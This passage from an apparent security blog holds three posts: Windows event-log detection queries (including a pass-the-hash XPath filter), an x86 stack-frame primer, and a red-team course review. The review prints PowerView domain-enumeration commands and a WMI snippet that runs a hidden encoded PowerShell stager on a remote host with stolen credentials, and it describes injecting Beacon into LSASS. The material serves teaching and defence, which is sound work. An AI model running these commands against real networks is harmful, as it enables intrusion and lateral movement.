  • A weekly report for created users and users added to privileged groups;
  • An alert for Security-enabled group modifications;
  • An alert for service account failed logins or account lockouts, although this is prone to alert-spamming in the case of an incorrectly configured script or service continually trying to log in;
  • An alert for three non-service failed logins to a non-user system after-hours;
  • Interactive logins by a service account; and
  • A successful user login from a non-whitelisted country

Table-2: Account Usage
Of course this is not a complete list of recommended alerts or reports, rather a couple of examples to get you started.

3. Remote Desktop Logon Detection

Remote desktop alerts and reports are tricky. Datacenter jumpboxes are among the most heavily used machines--they store endless amounts of 'temporary' data and are often the machines most sought after by a hacker. Typically, once a hacker gains access to a jumpbox they have access to your most valuable resources, so tracking access is very important.

But how do you identify when access is malicious? In a 24x7 SOC, access will be made 24 hours a day, so after-hour logins are not useful. This is something that I usually need to discuss at length with a client to really understand their environment before creating remote desktop alerts. Some general concepts are:

  • If your jumpbox is accessed from a specific subnet, alert when the connection is made from a different subnet, such as the DMZ.
  • Alert when a service account attempts to connect to a jumpbox
  • Alert or report for after-hour connections during non-change-window hours
Table-3: Remote Desktop Logins
A remote desktop login is a standard login with a Logon Type of 10. Logon types indicate the login methodology used--interactive, network, batch, service, etc. They are essential for understanding how someone accessed a system. There is a large difference between a user logging in after hours via an RDP session and a new scheduled task.
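As with the other categories, these are easy to spot-check from the command line while you tune your SIEM content. A sketch of a query for RDP logons (4624 with LogonType 10):
wevtutil qe Security /q:"*[System[(EventID=4624)]] and *[EventData[Data[@Name='LogonType']='10']]" /c:5 /rd:true /f:text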

4. Windows Defender Activities


This is pretty straightforward--a Windows Defender event shows detected malware, a failed scan, a failed update, etc. Essentially all events should be an alert.

Table-4: Windows Defender

5. Application Crashes

It is difficult to judge whether application crashes will make effective alerts or reports in a client's environment. I tend to try to determine if the company has the resources available to actively investigate why the application crashed. At the very least, a report or alert should be made for your high-value assets. That said, application crashes can be an indication of malicious code interfacing with an application to exploit it or replace it.

Table-5: Application Crashes

6. Software and Service Installation

Installed software and services should, at the least, generate a report, and an alert for high-priority assets (although change-window time frames can be excluded to avoid false positives.)
Table-6: Software and Service Installation

7. External Media Detection

There should always be a legitimate reason for plugging an external device into a high-value asset. An alert is recommended for medium- to high-severity events, and it is good to watch for cases where an external device is plugged in and a new service runs on the system within a few minutes, as this often indicates that something has executed off of the external media.

Table-7: External Media Detection

8. Pass the Hash Detection

Tracking user accounts for detecting Pass the Hash (PtH) requires creating a custom view with XML to configure more advanced filtering options. The event query language is based on XPath, a query language for selecting nodes from an XML document.

Spotting the Adversary has defined a QueryList described below that is limited in detecting PtH attacks. These queries focus on discovering lateral movement by an attacker using local accounts that are not part of the domain. The QueryList captures events that show a local account attempting to connect remotely to another machine not part of the domain. This event is a rarity so any occurrence should be treated as suspicious.

In the QueryList below, substitute the <DOMAIN NAME> section with the desired domain name.
<QueryList>
<Query Id="0" Path="ForwardedEvents">
<Select Path="ForwardedEvents">
*[System[(Level=4 or Level=0) and (EventID=4624)]]
and
*[EventData[Data[@Name='LogonType'] and (Data='3')]]
and
*[EventData[Data[@Name='AuthenticationPackageName'] = 'NTLM']]
and
*[EventData[Data[@Name='TargetUserName'] != 'ANONYMOUS LOGON']]
and
*[EventData[Data[@Name='TargetDomainName'] != '<DOMAIN NAME>']]
</Select>
</Query>

</QueryList>

These XPath queries are used for the Event Viewer’s Custom Views, and are not applicable to a SIEM itself.

The successful use of PtH for lateral movement between workstations would trigger the following:
  • Event ID 4624
  • Event level: Information
  • LogonType of 3
  • Logon method is NTLM authentication
  • A logon that is not a domain logon and not the ANONYMOUS LOGON account.

Table-8: Pass the Hash Successful Logon Properties

A failed PtH logon attempt would have all of the above properties except the Event ID, which would be 4625, indicating a failed logon:
Table-9: Pass the Hash Failed Logon Properties

Conclusion

The NSA's Spotting the Adversary with Windows Event Log Monitoring provides an excellent breakdown of key Windows events to use when creating an initial set of alerts and reports for key Windows assets. Part two will break down the second half of the event categories.

Monday, September 14, 2015

A Primer on Disassembling Function Calls and Understanding Stack Frames in x86

I've spent the better part of the last three months reviewing a plethora of exploit development tutorials and training material. Exploit development is a relatively specialized skill-set that serves a fairly niche market. The majority of offensive security professionals that I work with or encounter on a day-to-day basis perform Web Application assessments, Vulnerability Scanning, network Penetration Tests, Red-Teaming, Social Engineering and advise on security architecture design and philosophy. Individually, each of these categories requires significant technical aptitude, and in aggregate they represent a vast body of knowledge that necessitates both a formal education (typically) and several years of experience or self-study to achieve any sort of notable competence or proficiency.

It seems that the generalist will likely go the way of the dinosaur as more specializations and greater levels of complexity emerge (consequently requiring more ingenuity by a practitioner in any given area). This trend is observable in security firms that now segregate employees into increasing numbers of disparate groups with narrowing focus. Thomas Dixon began writing about this concept back in 1992 and I feel Andrew McAfee and Erik Brynjolfsson have helped to rejuvenate the discussion in recent years.

So why invest several months studying material in this area? I don't hunt bugs or sell exploit code for a living. Surely, this is an inefficient use of time.

There are a few reasons. Although I do not hunt bugs or write my own exploit code on a daily basis, I am highly dependent on those who do. The Vulnerability Scan that I run uses signatures identified by researchers that relate to specific software flaws. The Exploitation Framework that I employ requires exploit code and shellcode. Dependency can often feel like subordination. Your success, failure and innovation may be stifled or limited by that which you are dependent on. This is true in many aspects of life, but demonstrably more so in engineering-centric careers. To achieve true independence, and thus freedom, we have to attack knowledge dependencies.

The material I am presenting here is nothing revelatory and is likely explained better and more thoroughly somewhere else. Nonetheless, I am documenting it as part of my ongoing learning efforts and hope that it may help clarify the subject for others. This is not a comprehensive introduction to assembly language and assumes some basic knowledge.

Deciphering assembly is tedious at the best of times. The expressions feel archaic and are not designed with legibility in mind. Someone who is new to exploit development and reverse engineering will often feel lost while stepping through a sequence of instructions. Demystifying assembly is largely a matter of interpreting instruction set definitions and recognizing patterns that you can translate to familiar high level language concepts. There are a number of patterns or routines that become apparent the more time you spend in a debugger. Perhaps the most frequent occurrence is the function call. 

A function call is executed when a program wishes to pass execution from the named application entry point (commonly known as main) or another function to a specific sub-routine.  A function may contain parameters and local variables. A number of things must occur for an application to successfully execute a function call and pass execution to the set of instructions contained therein. This set of tasks is referred to as the function prologue. 

The prologue stores values on and prepares the stack so that the function can execute its instructions. It will also save reference points that give the application the ability to return from the function to the previous location in memory that executed the function call.


In this image we can see that our application has reached an instruction that will transfer control to some function. This is evident by the existence of the CALL instruction. The CALL itself does two things:
  1. Push the address of the next instruction (the contents of EIP plus the byte length of the current CALL instruction) onto the stack. This preserves the return address on the stack.
  2. Execute a JMP to the location of the function we are calling so as to transfer execution flow. 
In the main thread we can see that the CALL instruction is located at memory offset 00401143 and is 5 bytes in length. The value of EIP  + 5 is pushed onto the stack as this is the location of the next instruction in main. EIP is then loaded with the address of our function and a JMP is executed and we step into this function.

Execution flow is transferred to memory offset 00401020 (the address that was just loaded into EIP, which contains the start of the function's prologue). The prologue will almost always execute the following two instructions:
  1. PUSH EBP
  2. MOV EBP, ESP
EBP is the base pointer for the stack. It contains the static relative base location on the stack for our current frame and can be used to reference parameters that were pushed onto the stack or local variables contained within the current frame. ESP is the stack pointer and points to the top of the stack. It allows us to push and pop data off of the stack. The caller's EBP is pushed onto the stack so that it can be restored later, preserving a base value we can fall back to. The value of ESP is then moved into EBP so that EBP marks the base of the new frame, which at this moment is the top of the stack.

A PUSH command can be thought of as two consecutive events:
  1. SUB ESP, 4 - ESP is decremented by 4 bytes (as stack addressing grows downwards) to ensure that it points to a new location at the 'top' of the stack.
  2. MOV [ESP], X - our value is moved into this new location.
A POP instruction does the reverse: it moves the value at [ESP] into its operand and then increments ESP by 4 bytes.

It is also common to encounter a SUB ESP, X instruction in the function prologue. 

Consider the following function call:
void ExampleFunction()
{
     int a, b;
}
In this case our function has two local variables. To create space on the stack we would subtract 8 from ESP, growing our frame downward by 8 bytes (enough space to hold our two 4-byte local variables).

If parameters are passed to the function then they are pushed onto the stack in reverse order prior to the function call itself being executed. This implies that EBP + some offset can be used to reference function parameters and EBP - some offset can reference local values (alternatively one may simply utilize ESP).

The function epilogue is simply the inverse of the prologue:
  1. MOV ESP, EBP - Revert ESP to its prior value to free space on the stack.
  2. POP EBP - Restore EBP to its prior value.
  3. RET X - Execute a RET command to return to the prior calling function or main thread
RET can simply be thought of as a JMP to the return address (the value of EIP plus the CALL instruction's byte length) that was pushed onto the stack prior to jumping to our function. After our function prologue is unwound we pop this value to hop back to the next instruction address in the calling code.

Although there are compiler specific calling conventions that may introduce additional instructions, this summary should provide you with the information to recognize and interpret function calls in assembly. 

I may do a series that focuses on identifying and interpreting common high-level language expressions in assembly as I continue to dive into this material. Let me know if you have comments or feedback.

Related Links:
http://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-manual-325462.pdf

Sunday, September 13, 2015

Black Hat USA 2015 Course Review - Adaptive Red Team Tactics from Veris Group

My employer was gracious enough to send me to Black Hat USA this year. I've known for a long time that Black Hat is the premier conference in our industry and they most certainly have the broadest and best compendium of training on tap. Naturally I jumped at this opportunity and began considering which course to sign up for.

There were a number of options that were extremely enticing (Dark Side Ops from Silent Break Security, Special Topics in Malware Analysis from Mandiant, Shellcode Lab, and of course the regular offerings from Saumil Shah, Dave Kennedy and many others). Ultimately I elected to take a course that would benefit me both personally and professionally in the near term.  I wanted to study something that would be challenging and interesting but that would immediately benefit me at my current job (and possibly help us to expand our business). 

Black Hat has something for everyone (across the defensive and offensive spectrum) and after considerable deliberation I decided to register for Adaptive Red Team Tactics from Veris Group. This is an interesting team in that a lot of the core members burst onto the scene a few years ago with very high skill sets and seemingly no prior social media presence or history. It's no coincidence that many of them have military backgrounds, and it's easy to see that these defence and intelligence agencies are investing in and producing extremely capable information security professionals.

One of the issues with BlackHat is that there are very few course reviews available online. You may find the occasional critique on 'Ethical Hacker' or an independent blog such as this one but outside of that you are selecting a class somewhat blindly. This is in part my motivation for writing this post. I encourage other attendees to do the same. Ideally I would like to see BlackHat incorporate a formal community review and rating system to courses that are offered year after year (or at least instructor reviews).

The class was mainly taught by Will Schroeder and Justin Warner (with help from David McGuire and Jared Atkinson) over 2 days. Will and Justin are fairly well known on the conference circuit as they have made a lot of noise in the last couple of years due to the development of their offensive-oriented toolkits Veil and PowerView. I'm a big fan of both of these projects, and based on the military background I knew that these would be the ideal people to learn Red-Teaming from. Notably, Raphael Mudge (the creator of Cobalt Strike/Armitage) was also in attendance, which was a huge bonus. If they continue to use this tool as the primary post-exploitation framework then I'd like to see him continue to attend as his presence and contributions felt very natural. However, Will and Justin recently debuted Empire, a PowerShell-based post-exploitation tool that I feel will play a more prominent role should they continue to offer this training.

Red Teams in IT Security are somewhat of a new concept to non-governmental, non-defence organizations. The idea is that we have to go beyond Web Application Assessments, Penetration Testing, and Vulnerability Scanning in order to secure information assets and operations. Red Teams model advanced threat actor behaviour and embed themselves in an organization for an extended period of time. Similar to a Social Engineering project, Blue Teams (or defenders) should not be aware of the presence of a Red Team.

Penetration Testing will often reveal holes in the organization, poor practices, exploitable vulnerabilities, and other valuable information. But what value does this really provide defenders? Maybe now they have a few vulnerabilities they can go and patch, a user to reprimand, and a network to segment, but that hardly benefits the ongoing day-to-day defensive operations of the company. What did the individuals watching the SIEM and IPS/IDS get out of this engagement? Do they better understand offensive threat actor behaviour? Was there any qualitative or quantitative follow-up with the defenders to see if they caught anything? Were forensic artifacts provided by the penetration tester to help defenders improve? In traditional penetration testing, the answer is often simply no. There is still value in running a project like this, particularly for immature organizations that find a lot of these concepts extremely foreign. But for companies that have invested heavily in security products, people, and processes, this information does not drive their security program toward maturity and evolution.

Red Teams are all about advanced threat modelling. A penetration tester will typically look for vulnerabilities, exploit a system, elevate privileges, steal credentials and take over a domain controller. This is usually the extent of the project. Oftentimes Social Engineering is deemed out of scope, an internal foothold is provided to the penetration tester, and staff are informed of the event or, worse, the activity is whitelisted. A Red Team will look to model an advanced threat actor by establishing stealthy persistent backdoors, beaconing out to a command and control server, spreading laterally in an environment to take over as many systems and user accounts as possible, installing key-loggers, perusing sensitive file shares, identifying critical databases, exfiltrating data, and abusing domain trusts. This can be done using a black-box approach in which the Red Team must break past the perimeter using social engineering or by exploiting external-facing systems. Other companies may elect to plant someone on the inside and provide access, on the assumption that a foothold on the internal network has already been established.

This sequence of activities closely resembles the pattern of attack employed by hackers in massive breaches seen at Anthem, OPM, Target, and Sony. If you are worried about whether your network and employees are resilient to these types of breaches, you should be validating the effectiveness of your Blue Team by throwing a Red Team at them. 

The training environment focused on separating the class into different Red Teams, each tasked with attacking a network. We worked in teams of four and spent most of our time in Kali, Cobalt Strike, and PowerView (a PowerShell post-exploitation information-gathering tool). Metasploit is great, Meterpreter is great, and those projects have a very valid purpose, but they are not effective at emulating modern adversarial TTPs.

Day 1 - After some brief introductions and biographies we looked at defining and differentiating Red Teams from standard offensive security service offerings. We talked methodology, use cases, and general business-oriented knowledge. The rest of the day centred on installing Cobalt Strike, standing up a team server, stealthily profiling a target company and launching a spear phishing attack to establish a foothold. The lab network was very well set up and reliable, and each team had their own set of systems to attack. The class was given an introduction to Cobalt Strike so that we could understand the differences between Beacon and Meterpreter, set up listeners, launch spear phishing attacks and perform other functions without constantly having to reference the Cobalt Strike manual. Raphael obviously gave great insight into how to best use his product, and the Veris Group team focused a lot on emphasizing how to be stealthy and use the product to avoid touching disk and triggering alarms.

Many students immediately resorted to well-trodden offensive security methodology by running vulnerability scans and attempting to exploit the perimeter of the target environment. Veris Group had an active defender monitoring for noisy and obvious actions, and took steps to IP-ban or process-kill teams that failed to employ the stealthy tactics emphasized in the class material. Jared Atkinson (threat hunt lead for Veris Group) took the time to explain some of his defensive strategies and was primarily using tools he has helped to build (namely Invoke-IR and Uproot-IDS). This was a phenomenal aspect of the course, as we were essentially forced to adopt the lecture material that had been covered in order to be successful. Moreover, the theory did not feel specifically crafted for this course or environment, and consequently the attack tactics felt natural and applicable to real-world scenarios.

We also looked at how to profile a company, crawl public resources for information, and give context to phishing attacks by researching social networks and company-issued press releases. Emphasis was also placed on attacking weaker subsidiary organizations connected to the primary target. The instructors revealed the best ways to get a foothold on the target network (there were multiple avenues of attack, as in the real world) and ensured that all teams were caught up after giving each group ample time to launch their attacks independently.

Day 2 - Our time was primarily spent abusing native Operating System services and trusts to elevate privilege, move laterally, map domain trusts, identify sensitive users and files, exfiltrate data and establish persistence. Naturally, we used Veil and PowerView to abuse service and executable permissions and to scan the network for user accounts, local administrators, and interesting file shares. The instructors covered how this is nicely integrated with Cobalt Strike and introduced SMB Beacon, which is an exceptional way of pivoting stealthily in an environment to compromise additional hosts.
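
To give a sense of that enumeration workflow, here is a minimal PowerView sketch. The cmdlet names below match a 2015-era release of PowerView and may have been renamed in later versions, and the filtering is purely illustrative, so check the project repository for current syntax.

# Load PowerView into the current session
Import-Module .\PowerView.ps1

# Enumerate domain users and computers
Get-NetUser | Select-Object samaccountname, description
Get-NetComputer -FullData | Select-Object name, operatingsystem

# Find hosts where the current user context has local administrator rights
Invoke-FindLocalAdminAccess

# Hunt for readable, non-default file shares across the domain
Invoke-ShareFinder -CheckShareAccess -ExcludeStandard

# Locate machines where Domain Admins are logged in
Invoke-UserHunter -GroupName "Domain Admins"

Everything above runs in memory from an unprivileged domain user context, which is exactly why it pairs so well with a stealthy Beacon session.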

A lot of focus was given to explaining user privileges in modern Windows environments (TGT hashes, Golden Tickets, Silver Tickets, high-integrity user context) and how that maps back to the underlying Windows infrastructure (Kerberos, Active Directory). They also spent some time talking about Active Directory and demonstrating how their tools can be used to identify users and groups in a domain and to map transitive, bi-directional, or one-way trusts to other domains.
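
Again as a rough sketch, and with the caveat that PowerView's trust-mapping cmdlets have been renamed across releases, the trust enumeration in a 2015-era version looked something like this:

# Enumerate trusts for the current domain
Get-NetDomainTrust

# Enumerate trusts at the forest level
Get-NetForestTrust

# Recursively walk every reachable domain trust and report the relationships
Invoke-MapDomainTrust

The recursive mapping output is handy for spotting a weaker child or subsidiary domain with a bi-directional trust back to the primary target.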

We also covered the trade-offs between PSEXEC, WINRM, and WMI when employing 'Pass-the-Hash' based attacks and talked about the importance of leaving as few forensic artifacts as possible while never touching disk. Cobalt Strike's Beacon uses reflective PE/DLL injection wherever possible, which is very impressive. We even learned techniques to inject an encoded post-exploitation agent (Beacon) into a trusted process (LSASS) using a trusted, signed Windows binary (PowerShell). Combining this strategy with pivoting over named SMB pipes is incredibly stealthy. Anti-Virus who?
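
To illustrate why WMI is attractive compared to classic PSEXEC, here is a minimal sketch of remote process creation over WMI using built-in PowerShell cmdlets. The hostname, account, and payload placeholder are invented for the example, and actual pass-the-hash of an NTLM hash is normally handled by the tooling (e.g. mimikatz or Beacon) rather than by these cmdlets.

# Build a credential object from captured credentials (plaintext here for simplicity;
# the account and password are made up for this example)
$pass = ConvertTo-SecureString 'Summer2015!' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('CORP\svc_backup', $pass)

# Spawn a process on the remote host over WMI (DCOM/RPC); unlike PSEXEC,
# no service binary is copied to the target's disk
Invoke-WmiMethod -ComputerName fileserver01 -Credential $cred `
    -Class Win32_Process -Name Create `
    -ArgumentList 'powershell.exe -NoP -W Hidden -Enc <base64 stager>'

The trade-off is visibility: WMI avoids the service-creation events that PSEXEC generates, but the spawned powershell.exe child process is still something an alert defender can hunt for.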

Overall I was extremely satisfied with this course. I would definitely recommend it to anyone who is looking to learn about Red Teams and threat actor methodology, or who simply wants to add to their skill set. The material was well presented and challenging. The lab work was not linear or direct; it allowed for creative thinking and encouraged students to solve problems in many ways. I was exposed to new tools and feel confident using them in my job. If you work in offensive security and you aren't looking at Cobalt Strike, Beacon, PowerView, and Veil, then you are missing out on a world of opportunities. The course never lost sight of its goal, which is to have you apply these tools and knowledge in a way that emphasizes Red Teaming over Penetration Testing. The fundamental difference is that a Red Team wants data and information while a Penetration Tester just wants privileged access.

Related Links:
https://www.veil-framework.com/
http://www.advancedpentest.com/
http://www.invoke-ir.com/
https://github.com/PowerShellEmpire/